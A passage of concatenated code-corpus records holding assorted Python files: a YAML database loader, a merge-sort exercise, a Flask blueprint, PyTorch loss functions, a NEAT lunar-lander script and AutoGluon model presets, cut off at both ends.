open(os.path.join(self._dbpath, technology + \".yaml\"), \"r\") as f:\n lines = f.read()\n f.close()\n except OSError:\n raise KeyError(f\"Could not find entry for {technology} in database.\")\n\n fdata = yaml.load(lines, yaml.Loader)\n\n # Store data in cache and return\n self._cached_files[technology] = fdata\n return fdata\n\n def _load_component_list(self):\n \"\"\"\n Load list of supported components from component_list.yaml file and\n store as _component_list attribute.\n\n Returns:\n None\n \"\"\"\n try:\n with open(os.path.join(self._dbpath, \"component_list.yaml\"), \"r\") as f:\n lines = f.read()\n f.close()\n except OSError:\n raise KeyError(\"Could not find component_list.yaml in database.\")\n\n self._component_list = yaml.load(lines, yaml.Loader)\n","sub_path":"watertap/core/wt_database.py","file_name":"wt_database.py","file_ext":"py","file_size_in_byte":7980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"506964637","text":"import math\nimport random\n\ndef zerolistmaker(n):\n listofzeros = [0] * n\n return listofzeros\n\ndef mergeSort(numArray):\n n = len(numArray)\n \n if n == 1:\n y = numArray\n else:\n m = int(math.floor(n/2));\n y1 = mergeSort(numArray[:m])\n y2 = mergeSort(numArray[(m+1):n])\n # y = merge(y1,y2)\n ## return y\n\ndef merge(x,y):\n n = len(x)\n m = len(y)\n z = len(m+n)\n sortArray = zerolistmaker(z)\n \n indexX = 0\n indexY = 0\n \n for indexZ in range(z):\n \n if indexX > n:\n indexX = indexX + 1;\n elif indexY > m:\n indexY = indexY + 1;\n elif x[indexX] <= y[indexY]:\n sortArray[indexZ] = x[indexX];\n indexX = indexX + 1;\n else:\n sortArray[indexZ] = y[indexX]\n y[indexX] = y[indexX] + 1\n\n return sortArray\n\n\narray = [random.randint(1,200) for _ in range(1000)]\narray = mergeSort(array)\nprint(array)\n\n\n\n","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"202053612","text":"#介绍\nclass Introduce:\n #类的初始化函数\n def __init__(self,Name,Age,Sex,Weight):\n self.ch_name = Name\n self.age = Age\n self.sex = Sex\n self.weight = Weight\n\n def introduce(self):\n print(\"大家好,我是%s,今年%d岁,性别%s,体重%.1f千克\"\n %(self.ch_name,self.age,self.sex,self.weight))\n\n#继承介绍类\nclass JieIntroduce(Introduce):\n hobby = \"编程\"\n def jie_introduce(self):\n print(\"大家好,我是%s,今年%d岁,性别%s,体重%.1f千克,爱好是%s。\"\n %(self.ch_name,self.age,self.sex,self.weight,self.hobby))\n\nj = JieIntroduce(\"罗凡林\",25,\"男\",63)\nj.jie_introduce()","sub_path":"ferry_devel/views/practice/类的继承.py","file_name":"类的继承.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572376644","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models, _\nfrom odoo.addons.mail.wizard.mail_compose_message import _reopen\n\n\nclass AccountInvoiceSend(models.TransientModel):\n _inherit = 'account.invoice.send'\n\n @api.onchange('template_id')\n def onchange_template_id(self):\n res = super(AccountInvoiceSend, self).onchange_template_id()\n if self.invoice_ids:\n attachment_ids = self.invoice_ids.mapped(lambda rec: rec.create_attachment())\n self.attachment_ids = self.attachment_ids.ids + attachment_ids[0]\n return res\n","sub_path":"l10n_pe_facturalo/wizard/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"396500679","text":"import datetime\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for,redirect,session\nfrom werkzeug.utils import redirect\nimport src.models.users.decorators as user_decorators\nfrom src.models.projects.projects import Project\nfrom src.models.users.users import User\nfrom src.models.reminder.notification import Event\n\nprojects_blueprint = Blueprint('projects', __name__)\n\n@projects_blueprint.context_processor\ndef user():\n return dict(user=User.get_by_email(session['email']))\n\n\n\n@projects_blueprint.route('/')\ndef home(project_id):\n return render_template('projects/home.html', project=Project.get_by_id(project_id))\n\n@projects_blueprint.route('/new', methods=['GET','POST'])\ndef new_project():\n if request.method == 'POST':\n name = request.form['name']\n date = ''.join(request.form['due_date'].split('/'))\n due_date = datetime.datetime.strptime(date, '%d%m%Y')\n priority = int(request.form['priority'])\n owner = session['email']\n project = Project(name=name, owner=owner, due_date=due_date, priority=priority)\n project_notif = Event({'Project':project._id},notify=[owner], _id=project._id)\n project.save_to_db()\n project_notif.save_to_db()\n user = User.get_by_email(session['email'])\n user.projects.append(project._id)\n user.save_to_db()\n\n return redirect(url_for('.home', project_id=project._id))\n return render_template('projects/new_project.html')\n\n@projects_blueprint.route('//new-note', methods=['GET', 'POST'])\ndef new_note(project_id):\n if request.method == 'POST':\n project_note = request.form['project-note']\n Project.get_by_id(project_id).add_comment(project_note)\n Event.get_by_id(project_id).project_note_added(session['email'], project_note)\n return redirect(url_for('.home',project_id=project_id))\n return render_template('projects/new_note.html',project=Project.get_by_id(project_id))\n\n@projects_blueprint.route('//new-task', methods=['GET', 'POST'])\ndef new_task(project_id):\n Event.get_by_id(project_id).project_task_added(session['email'])\n return render_template('projects/project_new_task.html',project=Project.get_by_id(project_id))\n\n\n@projects_blueprint.route('/edit/',methods=['GET','POST'])\ndef edit_project(project_id):\n pass","sub_path":"src/models/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"208735527","text":"import torch\nfrom pytorch_msssim import ssim, ms_ssim, SSIM, MS_SSIM\nimport torch.nn.functional as F\nimport torch.nn as nn\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef ssim_loss(y_pred, y_true):\n if len(y_pred.shape) == 3:\n y_pred = y_pred.unsqueeze(0)\n if len(y_true.shape) == 3:\n y_true = y_true.unsqueeze(0)\n return 1 - ms_ssim(y_pred, y_true, data_range=1, size_average=True)\n\n\nclass SegmentationLosses(object):\n def __init__(self, weight=None, batch_average=True, ignore_index=255):\n self.ignore_index = ignore_index\n self.weight = weight\n self.batch_average = batch_average\n\n def build_loss(self, mode='ce'):\n \"\"\"Choices: ['ce' or 'focal']\"\"\"\n if mode == 'ce':\n return self.CrossEntropyLoss\n elif mode == 'focal':\n return self.FocalLoss\n else:\n raise NotImplementedError\n\n def CrossEntropyLoss(self, logit, target):\n n, c, h, w = logit.size()\n criterion = nn.CrossEntropyLoss(\n weight=self.weight, ignore_index=self.ignore_index)\n criterion = criterion.to(device)\n\n loss = criterion(logit, target.long())\n\n if self.batch_average:\n loss /= n\n\n return loss\n\n def FocalLoss(self, logit, target, gamma=2, alpha=0.5):\n n, c, h, w = logit.size()\n criterion = nn.CrossEntropyLoss(\n weight=self.weight, ignore_index=self.ignore_index)\n\n criterion = criterion.to(device)\n\n logpt = -criterion(logit, target.long())\n pt = torch.exp(logpt)\n if alpha is not None:\n logpt *= alpha\n loss = -((1 - pt) ** gamma) * logpt\n\n if self.batch_average:\n loss /= n\n\n return loss\n\n\ndef trimap_prediction_loss(trimap_pred, trimap_true):\n trimap_true[trimap_true == 0] = 0\n trimap_true[trimap_true == 128] = 1\n trimap_true[trimap_true == 255] = 2\n criterion = SegmentationLosses(batch_average=True).build_loss('ce')\n return criterion(trimap_pred, trimap_true)\n\n\ndef alpha_prediction_loss(y_pred, y_true):\n diff = y_pred - y_true\n diff = diff\n return torch.sum(torch.sqrt(torch.pow(diff, 2) + epsilon_sqr)) / (y_true.numel() + epsilon)\n\n\ndef alpha_prediction_loss_with_trimap(y_pred, y_true, trimap):\n weighted = torch.zeros(trimap.shape, device=device)\n weighted[trimap == 128] = 1.\n diff = y_pred - y_true\n diff = diff * weighted\n alpha_loss = torch.sqrt(diff ** 2 + 1e-12)\n return torch.sum(alpha_loss) / (weighted.sum() + 1.)\n\n\nclass LossFunction(object):\n def __init__(self, stage):\n self.stage = stage\n self.trimap_criterion = SegmentationLosses(\n batch_average=True).build_loss('ce')\n\n def __call__(self):\n if self.stage == 'train_trimap':\n return self.trimap_loss\n elif self.stage == 'train_alpha':\n return self.fusion_loss\n\n def trimap_loss(self, trimap_pred, trimap_true):\n mask = torch.zeros(trimap_true.shape, device=device)\n # mask[trimap_true == 0] = 0\n mask[trimap_true == 128] = 1\n mask[trimap_true == 255] = 2\n return self.trimap_criterion(trimap_pred, mask)\n\n def alpha_prediction_loss_with_trimap(self, y_pred, y_true, trimap):\n weighted = torch.zeros(trimap.shape, device=device)\n weighted[trimap == 128] = 1.\n diff = y_pred - y_true\n diff = diff * weighted\n alpha_loss = torch.sqrt(diff ** 2 + 1e-12)\n return torch.sum(alpha_loss) / (weighted.sum() + 1.)\n\n def fusion_loss(self, y_pred, y_true, trimap_pred, trimap_true):\n return self.alpha_prediction_loss_with_trimap(y_pred, y_true, trimap_true)\n # + 0.025 * ssim_loss(y_pred, y_true)\n # + 0.01 * self.trimap_loss(trimap_pred, trimap_true)\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"63696850","text":"import json\nimport os\n\n\n#获取配置文件\ndef get_config():\n with open(\"./config.json\", \"r\", encoding=\"utf-8\") as f:\n configs = json.load(f)\n return configs\n\n#写入配置文件\ndef set_config(config_class, key, value):\n configs = get_config()\n configs[config_class][key] = value\n with open(\"./config.json\", 'w', encoding=\"utf-8\") as f:\n json.dump(configs, f, ensure_ascii=False, indent=4)\n\n\n\n#获取index_word\ndef get_index_word():\n configs = get_config()\n index_word_path = configs[\"other\"][\"index_word_path\"]\n with open(index_word_path, \"r\", encoding=\"utf-8\") as f:\n index_word = json.load(f)\n return index_word\n\n#获取word_index\ndef get_word_index():\n configs = get_config()\n word_index_path = configs[\"other\"][\"word_index_path\"]\n with open(word_index_path, \"r\", encoding=\"utf-8\") as f:\n word_index = json.load(f)\n return word_index\n\n#根据数据文件夹名获取所有的文件名,包括文本文件名和音频文件名列表\ndef get_all_data_path(data_path):\n #data_path是数据文件夹的路径\n files = os.listdir(data_path) #得到数据文件夹下的所有文件名称list\n text_data_path = files.pop()\n audio_data_path_list = files\n return text_data_path, audio_data_path_list\n\n\nif __name__ == \"__main__\":\n pass","sub_path":"hlp/stt/ds2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246978462","text":"# Evolve a control/reward estimation network for the OpenAI Gym\n# LunarLander-v2 environment (https://gym.openai.com/envs/LunarLander-v2).\n# Sample run here: https://gym.openai.com/evaluations/eval_FbKq5MxAS9GlvB7W6ioJkg\n\nfrom __future__ import print_function\n\nimport gym\nimport gym.wrappers\n\nimport matplotlib.pyplot as plt\n\nimport multiprocessing\nimport neat\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport time\n\nimport visualize\n\nenv = gym.make('LunarLander-v2')\n\nprint(\"action space: {0!r}\".format(env.action_space))\nprint(\"observation space: {0!r}\".format(env.observation_space))\n\nenv = gym.wrappers.Monitor(env, 'results', force=True)\n\n\nclass LanderGenome(neat.DefaultGenome):\n def __init__(self, key):\n super().__init__(key)\n self.discount = None\n\n def configure_new(self, config):\n super().configure_new(config)\n self.discount = 0.01 + 0.98 * random.random()\n\n def configure_crossover(self, genome1, genome2, config):\n super().configure_crossover(genome1, genome2, config)\n self.discount = random.choice((genome1.discount, genome2.discount))\n\n def mutate(self, config):\n super().mutate(config)\n self.discount += random.gauss(0.0, 0.05)\n self.discount = max(0.01, min(0.99, self.discount))\n\n def distance(self, other, config):\n dist = super().distance(other, config)\n disc_diff = abs(self.discount - other.discount)\n return dist + disc_diff\n\n\ndef compute_fitness(net, episodes):\n reward_error = []\n for score, observations, acts, rewards in episodes:\n for o, a, r in zip(observations, acts, rewards):\n output = net.activate(o)\n reward_error.append(float((output[a] - r) ** 2))\n\n return reward_error\n\n\nclass PooledErrorCompute(object):\n def __init__(self):\n self.pool = multiprocessing.Pool()\n self.test_episodes = []\n\n self.min_reward = -200\n self.max_reward = 200\n\n self.episode_score = []\n self.episode_length = []\n\n def evaluate_genomes(self, genomes, config):\n t0 = time.time()\n nets = []\n for gid, g in genomes:\n nets.append((g, neat.nn.FeedForwardNetwork.create(g, config)))\n g.fitness = []\n\n print(\"network creation time {0}\".format(time.time() - t0))\n t0 = time.time()\n\n episodes = []\n for genome, net in nets:\n observation = env.reset()\n step = 0\n observations = []\n actions = []\n rewards = []\n while 1:\n step += 1\n if step < 200 and random.random() < 0.2:\n action = env.action_space.sample()\n else:\n output = net.activate(observation)\n action = np.argmax(output)\n\n observation, reward, done, info = env.step(action)\n observations.append(observation)\n actions.append(action)\n rewards.append(reward)\n\n if done:\n break\n\n total_score = sum(rewards)\n self.episode_score.append(total_score)\n self.episode_length.append(step)\n\n # Compute discounted rewards.\n m = int(round(np.log(0.01) / np.log(genome.discount)))\n discount_function = [genome.discount ** (m - i) for i in range(m + 1)]\n #rewards = np.array([reward for observation, action, reward in episode])\n disc_rewards = np.convolve(rewards, discount_function)[m:]\n\n # Normalize discounted rewards.\n normed_rewards = 2 * (disc_rewards - self.min_reward) / (self.max_reward - self.min_reward) - 1.0\n\n episodes.append((total_score, observations, actions, normed_rewards))\n genome.fitness = total_score\n\n print(\"simulation run time {0}\".format(time.time() - t0))\n t0 = time.time()\n\n # Randomly choose subset of episodes for evaluation of genome reward estimation.\n #self.test_episodes.extend(random.choice(episodes)[1] for _ in range(20))\n self.test_episodes.extend(episodes)\n #self.test_episodes = [random.choice(self.test_episodes) for _ in range(200)]\n self.test_episodes = self.test_episodes[-1500:]\n eps = [random.choice(self.test_episodes) for _ in range(50)]\n\n print(\"Evaluating {0} test episodes\".format(len(eps)))\n\n jobs = []\n for genome, net in nets:\n jobs.append(self.pool.apply_async(compute_fitness, (net, eps)))\n\n # Assign a composite fitness to each genome; genomes can make progress either\n # by improving their total reward or by making more accurate reward estimates.\n for job, (genome_id, genome) in zip(jobs, genomes):\n reward_error = job.get(timeout=None)\n genome.fitness -= 50 * np.mean(reward_error)\n\n print(\"final fitness compute time {0}\\n\".format(time.time() - t0))\n\n\ndef run():\n # Load the config file, which is assumed to live in\n # the same directory as this script.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config')\n config = neat.Config(LanderGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n\n pop = neat.Population(config)\n stats = neat.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(neat.StdOutReporter(True))\n # Checkpoint every 25 generations or 900 seconds.\n pop.add_reporter(neat.Checkpointer(25, 900))\n\n # Run until the winner from a generation is able to solve the environment\n # or the user interrupts the process.\n ec = PooledErrorCompute()\n while 1:\n try:\n pop.run(ec.evaluate_genomes, 1)\n\n visualize.plot_stats(stats, ylog=False, view=False, filename=\"fitness.svg\")\n\n plt.plot(ec.episode_score, 'g-', label='score')\n plt.plot(ec.episode_length, 'b-', label='length')\n plt.grid()\n plt.legend(loc='best')\n plt.savefig(\"scores.svg\")\n plt.close()\n\n mfs = sum(stats.get_fitness_mean()[-5:]) / 5.0\n print(\"Average mean fitness over last 5 generations: {0}\".format(mfs))\n\n mfs = sum(stats.get_fitness_stat(min)[-5:]) / 5.0\n print(\"Average min fitness over last 5 generations: {0}\".format(mfs))\n\n # Use the five best genomes seen so far as an ensemble-ish control system.\n best_genomes = stats.best_unique_genomes(5)\n best_networks = []\n for g in best_genomes:\n best_networks.append(neat.nn.FeedForwardNetwork.create(g, config))\n\n solved = True\n best_scores = []\n for k in range(100):\n observation = env.reset()\n score = 0\n step = 0\n while 1:\n step += 1\n # Use the total reward estimates from all five networks to\n # determine the best action given the current state.\n total_rewards = np.zeros((4,))\n for n in best_networks:\n output = n.activate(observation)\n total_rewards += output\n\n best_action = np.argmax(total_rewards)\n observation, reward, done, info = env.step(best_action)\n score += reward\n env.render()\n if done:\n break\n\n ec.episode_score.append(score)\n ec.episode_length.append(step)\n\n best_scores.append(score)\n avg_score = sum(best_scores) / len(best_scores)\n print(k, score, avg_score)\n if avg_score < 200:\n solved = False\n break\n\n if solved:\n print(\"Solved.\")\n\n # Save the winners.\n for n, g in enumerate(best_genomes):\n name = 'winner-{0}'.format(n)\n with open(name+'.pickle', 'wb') as f:\n pickle.dump(g, f)\n\n visualize.draw_net(config, g, view=False, filename=name+\"-net.gv\")\n visualize.draw_net(config, g, view=False, filename=name+\"-net-enabled.gv\",\n show_disabled=False)\n visualize.draw_net(config, g, view=False, filename=name+\"-net-enabled-pruned.gv\",\n show_disabled=False, prune_unused=True)\n\n break\n except KeyboardInterrupt:\n print(\"User break.\")\n break\n\n env.close()\n\n\nif __name__ == '__main__':\n run()","sub_path":"python/CodeReclaimers_neat-python/neat-python-master/examples/openai-lander/evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519777902","text":"import copy\nimport inspect\nimport logging\nfrom collections import defaultdict\n\nfrom sklearn.linear_model import LogisticRegression, LinearRegression\n\nfrom ...constants import AG_ARGS, AG_ARGS_FIT, BINARY, MULTICLASS, REGRESSION, SOFTCLASS, PROBLEM_TYPES_CLASSIFICATION\nfrom ...models.abstract.abstract_model import AbstractModel\nfrom ...models.fastainn.tabular_nn_fastai import NNFastAiTabularModel\nfrom ...models.lgb.lgb_model import LGBModel\nfrom ...models.lr.lr_model import LinearModel\nfrom ...models.tabular_nn.tabular_nn_model import TabularNeuralNetModel\nfrom ...models.rf.rf_model import RFModel\nfrom ...models.knn.knn_model import KNNModel\nfrom ...models.catboost.catboost_model import CatboostModel\nfrom ...models.xt.xt_model import XTModel\nfrom ...metrics import soft_log_loss, mean_squared_error\n\nlogger = logging.getLogger(__name__)\n\n# Higher values indicate higher priority, priority dictates the order models are trained for a given level.\nDEFAULT_MODEL_PRIORITY = dict(\n RF=100,\n XT=90,\n KNN=80,\n GBM=70,\n CAT=60,\n NN=50,\n FASTAI=45,\n LR=40,\n custom=0,\n)\n\n# Problem type specific model priority overrides (will update default values in DEFAULT_MODEL_PRIORITY)\nPROBLEM_TYPE_MODEL_PRIORITY = {\n MULTICLASS: dict(\n NN=120,\n FASTAI=115,\n KNN=110,\n ),\n}\n\nDEFAULT_SOFTCLASS_PRIORITY = dict(\n GBM=100,\n NN=90,\n RF=80,\n CAT=60,\n custom=0,\n)\n\nDEFAULT_CUSTOM_MODEL_PRIORITY = 0\n\nMODEL_TYPES = dict(\n RF=RFModel,\n XT=XTModel,\n KNN=KNNModel,\n GBM=LGBModel,\n CAT=CatboostModel,\n NN=TabularNeuralNetModel,\n LR=LinearModel,\n FASTAI=NNFastAiTabularModel,\n)\n\nDEFAULT_MODEL_NAMES = {\n RFModel: 'RandomForest',\n XTModel: 'ExtraTrees',\n KNNModel: 'KNeighbors',\n LGBModel: 'LightGBM',\n CatboostModel: 'Catboost',\n TabularNeuralNetModel: 'NeuralNet',\n LinearModel: 'LinearModel',\n NNFastAiTabularModel: 'FastAINeuralNet',\n}\n\n\ndef _dd_classifier():\n return 'Classifier'\n\n\ndef _dd_regressor():\n return 'Regressor'\n\n\nDEFAULT_MODEL_TYPE_SUFFIX = dict(\n classifier=defaultdict(_dd_classifier),\n regressor=defaultdict(_dd_regressor),\n)\nDEFAULT_MODEL_TYPE_SUFFIX['classifier'].update({LinearModel: ''})\nDEFAULT_MODEL_TYPE_SUFFIX['regressor'].update({LinearModel: ''})\n\n\n# DONE: Add levels, including 'default'\n# DONE: Add lists\n# DONE: Add custom which can append to lists\n# DONE: Add special optional AG args for things like name prefix, name suffix, name, etc.\n# TODO: Move creation of stack ensemble internally into this function? Requires passing base models in as well.\n# DONE: Add special optional AG args for training order\n# TODO: Add special optional AG args for base models\n# TODO: Consider making hyperparameters arg in fit() accept lists, concatenate hyperparameter sets together.\n# TODO: Consider adding special optional AG args for #cores,#gpus,num_early_stopping_iterations,etc.\n# DONE: Consider adding special optional AG args for max train time, max memory size, etc.\n# TODO: Consider adding special optional AG args for use_original_features,features_to_use,etc.\n# TODO: Consider adding optional AG args to dynamically disable models such as valid_num_classes_range, valid_row_count_range, valid_feature_count_range, etc.\n# TODO: Args such as max_repeats, num_folds\n# TODO: Add banned_model_types arg\n# TODO: Add option to update hyperparameters with only added keys, so disabling CatBoost would just be {'CAT': []}, which keeps the other models as is.\n# TODO: special optional AG arg for only training model if eval_metric in list / not in list. Useful for F1 and 'is_unbalanced' arg in LGBM.\ndef get_preset_models(path, problem_type, eval_metric, hyperparameters, stopping_metric=None, num_classes=None, hyperparameter_tune=False,\n level='default', extra_ag_args_fit=None, name_suffix='', default_priorities=None):\n if problem_type not in [BINARY, MULTICLASS, REGRESSION, SOFTCLASS]:\n raise NotImplementedError\n if default_priorities is None:\n default_priorities = copy.deepcopy(DEFAULT_MODEL_PRIORITY)\n if problem_type in PROBLEM_TYPE_MODEL_PRIORITY:\n default_priorities.update(PROBLEM_TYPE_MODEL_PRIORITY[problem_type])\n\n if level in hyperparameters.keys():\n level_key = level\n else:\n level_key = 'default'\n hp_level = hyperparameters[level_key]\n priority_dict = defaultdict(list)\n for model_type in hp_level:\n for model in hp_level[model_type]:\n model = copy.deepcopy(model)\n if AG_ARGS not in model:\n model[AG_ARGS] = dict()\n if 'model_type' not in model[AG_ARGS]:\n model[AG_ARGS]['model_type'] = model_type\n model_priority = model[AG_ARGS].get('priority', default_priorities.get(model_type, DEFAULT_CUSTOM_MODEL_PRIORITY))\n # Check if model is valid\n if hyperparameter_tune and model[AG_ARGS].get('disable_in_hpo', False):\n continue # Not valid\n priority_dict[model_priority].append(model)\n model_priority_list = [model for priority in sorted(priority_dict.keys(), reverse=True) for model in priority_dict[priority]]\n model_names_set = set()\n models = []\n for model in model_priority_list:\n model_type = model[AG_ARGS]['model_type']\n if not inspect.isclass(model_type):\n model_type = MODEL_TYPES[model_type]\n elif not issubclass(model_type, AbstractModel):\n logger.warning(f'Warning: Custom model type {model_type} does not inherit from {AbstractModel}. This may lead to instability. Consider wrapping {model_type} with an implementation of {AbstractModel}!')\n else:\n logger.log(20, f'Custom Model Type Detected: {model_type}')\n name_orig = model[AG_ARGS].get('name', None)\n if name_orig is None:\n name_main = model[AG_ARGS].get('name_main', DEFAULT_MODEL_NAMES.get(model_type, model_type.__name__))\n name_prefix = model[AG_ARGS].get('name_prefix', '')\n name_type_suffix = model[AG_ARGS].get('name_type_suffix', None)\n if name_type_suffix is None:\n suffix_key = 'classifier' if problem_type in (PROBLEM_TYPES_CLASSIFICATION+[SOFTCLASS]) else 'regressor'\n name_type_suffix = DEFAULT_MODEL_TYPE_SUFFIX[suffix_key][model_type]\n name_suff = model[AG_ARGS].get('name_suffix', '')\n name_orig = name_prefix + name_main + name_type_suffix + name_suff\n name = name_orig\n num_increment = 2\n while name in model_names_set: # Ensure name is unique\n name = f'{name_orig}_{num_increment}'\n num_increment += 1\n model_names_set.add(name)\n model_params = copy.deepcopy(model)\n model_params.pop(AG_ARGS)\n if extra_ag_args_fit is not None:\n if AG_ARGS_FIT not in model_params:\n model_params[AG_ARGS_FIT] = {}\n model_params[AG_ARGS_FIT].update(extra_ag_args_fit.copy()) # TODO: Consider case of overwriting user specified extra args.\n model_init = model_type(path=path, name=name, problem_type=problem_type, eval_metric=eval_metric, stopping_metric=stopping_metric, num_classes=num_classes, hyperparameters=model_params)\n models.append(model_init)\n\n for model in models:\n model.rename(model.name + name_suffix)\n\n return models\n\n\ndef get_preset_stacker_model(path, problem_type, eval_metric, num_classes=None,\n hyperparameters={'NN': {}, 'GBM': {}}, hyperparameter_tune=False):\n # TODO: Expand options to RF and NN\n if problem_type == REGRESSION:\n model = RFModel(path=path, name='LinearRegression', model=LinearRegression(),\n problem_type=problem_type, eval_metric=eval_metric)\n else:\n model = RFModel(path=path, name='LogisticRegression', model=LogisticRegression(\n solver='liblinear', multi_class='auto', max_iter=500, # n_jobs=-1 # TODO: HP set to hide warnings, but we should find optimal HP for this\n ), problem_type=problem_type, eval_metric=eval_metric)\n return model\n\n\ndef get_preset_models_softclass(path, hyperparameters, num_classes=None, hyperparameter_tune=False, name_suffix=''):\n model_types_standard = ['GBM','NN','CAT']\n hyperparameters = copy.deepcopy(hyperparameters)\n hyperparameters_standard = copy.deepcopy(hyperparameters)\n hyperparameters_rf = copy.deepcopy(hyperparameters)\n default_level_key = 'default'\n if default_level_key in hyperparameters:\n hyperparameters_standard[default_level_key] = {key: hyperparameters_standard[default_level_key][key] for key in hyperparameters_standard[default_level_key] if key in model_types_standard}\n hyperparameters_rf[default_level_key] = {key: hyperparameters_rf[default_level_key][key] for key in hyperparameters_rf[default_level_key] if key == 'RF'}\n else:\n hyperparameters_standard ={key: hyperparameters_standard[key] for key in hyperparameters_standard if key in model_types_standard}\n hyperparameters_rf ={key: hyperparameters_rf[key] for key in hyperparameters_rf if key == 'RF'}\n # TODO: add support for per-stack level hyperparameters\n models = get_preset_models(path=path, problem_type=SOFTCLASS, eval_metric=soft_log_loss, stopping_metric=soft_log_loss,\n hyperparameters=hyperparameters_standard, num_classes=num_classes, hyperparameter_tune=hyperparameter_tune,\n name_suffix=name_suffix, default_priorities=DEFAULT_SOFTCLASS_PRIORITY)\n # Swap RF criterion for MSE:\n rf_models = []\n if len(hyperparameters_rf) > 0:\n rf_newparams = {'criterion': 'mse', 'AG_args': {'name_suffix': 'MSE'}}\n if 'RF' in hyperparameters_rf:\n rf_params = hyperparameters_rf['RF']\n elif 'default' in hyperparameters_rf and 'RF' in hyperparameters_rf['default']:\n rf_params = hyperparameters_rf['default']['RF']\n else:\n rf_params = None\n if isinstance(rf_params, list):\n for i in range(len(rf_params)):\n rf_params[i].update(rf_newparams)\n rf_params = [j for n, j in enumerate(rf_params) if j not in rf_params[(n+1):]] # Remove duplicates which may arise after overwriting criterion\n elif rf_params is not None:\n rf_params.update(rf_newparams)\n if 'RF' in hyperparameters_rf:\n hyperparameters_rf['RF'] = rf_params\n elif 'default' in hyperparameters_rf and 'RF' in hyperparameters_rf['default']:\n hyperparameters_rf['default']['RF'] = rf_params\n rf_models = get_preset_models(path=path, problem_type=REGRESSION, eval_metric=mean_squared_error,\n hyperparameters=hyperparameters_rf, hyperparameter_tune=hyperparameter_tune,\n name_suffix=name_suffix, default_priorities=DEFAULT_SOFTCLASS_PRIORITY)\n models_cat = [model for model in models if 'Catboost' in model.name]\n models_noncat = [model for model in models if 'Catboost' not in model.name]\n models = models_noncat + rf_models + models_cat\n if len(models) == 0:\n raise ValueError(\"At least one of the following model-types must be present in hyperparameters: ['GBM','CAT','NN','RF'], \"\n \"These are the only supported models for softclass prediction problems. \"\n \"Softclass problems are also not yet supported for fit() with per-stack level hyperparameters.\")\n for model in models:\n model.normalize_pred_probas = True\n model.name = model.name.replace('Regressor', 'Classifier') # conceal from user that model may actually be a regressor.\n\n return models\n\n\n\"\"\"\ndef get_preset_models_softclassOLD(path, num_classes=None, hyperparameters={'GBM':{}, 'CAT':{}, 'NN':{}, 'RF':{}},\n hyperparameter_tune=False, name_suffix=''):\n models = []\n extra_models = []\n model_types_standard = ['GBM','NN','CAT']\n for modeltype_name in model_types_standard:\n modeltype_options = None\n if modeltype_name in hyperparameters:\n modeltype_options = hyperparameters[modeltype_name]\n elif 'default' in hyperparameters and modeltype_name in hyperparameters['default']:\n modeltype_options = hyperparameters['default'][modeltype_name]\n if modeltype_options is not None:\n model_class = MODEL_TYPES[modeltype_name]\n display_name = DEFAULT_MODEL_NAMES[model_class] + 'SoftClassifier'\n if not isinstance(modeltype_options, list):\n modeltype_options = [modeltype_options]\n for modeltype_option in modeltype_options:\n model_obj = model_class(path=path, name=display_name, problem_type=SOFTCLASS, num_classes=num_classes,\n eval_metric=soft_log_loss, stopping_metric=soft_log_loss, hyperparameters=modeltype_option.copy())\n if modeltype_name == 'CAT':\n extra_models.append(model_obj) # only train CAT models last\n else:\n models.append(model_obj)\n\n rf_type_name = 'RF'\n rf_options = hyperparameters.get(rf_type_name, None)\n rf_params = {'model_type': 'rf'}\n rf_params.update(hyperparameters.copy())\n rf_params['criterion'] = 'mse'\n if rf_options is not None:\n rf_class = MODEL_TYPES[rf_type_name]\n rf_display_name = DEFAULT_MODEL_NAMES[rf_class] + 'SoftClassifier'\n models.append(rf_class(path=path, name=rf_display_name, problem_type=REGRESSION,\n eval_metric=mean_squared_error, hyperparameters=rf_params)\n )\n\n models = models + extra_models\n for model in models:\n model.rename(model.name + name_suffix)\n model.normalize_pred_probas = True\n\n return models\n\"\"\"","sub_path":"tabular/src/autogluon/tabular/trainer/model_presets/presets.py","file_name":"presets.py","file_ext":"py","file_size_in_byte":13909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"517725365","text":"import os\nimport random\nfrom dateutil import parser\n\n__author__ = 'Gokcen'\n\nfrom pprint import pprint as pp\nimport functools\n\nfrom skyscanner.skyscanner import Flights, Transport, FlightsCache, Hotels\n\n\nAPI_KEY = os.environ['SKYSCANNER_KEY']\n\n###\n\n\n@functools.lru_cache(maxsize=1024)\ndef city_string_to_id(city_as_str):\n transport_service = Transport(API_KEY)\n city_suggestion_results = transport_service.location_autosuggest(**{\n 'market': 'ES',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'query': city_as_str\n }).json()['Places']\n if not city_suggestion_results:\n return None\n else:\n return 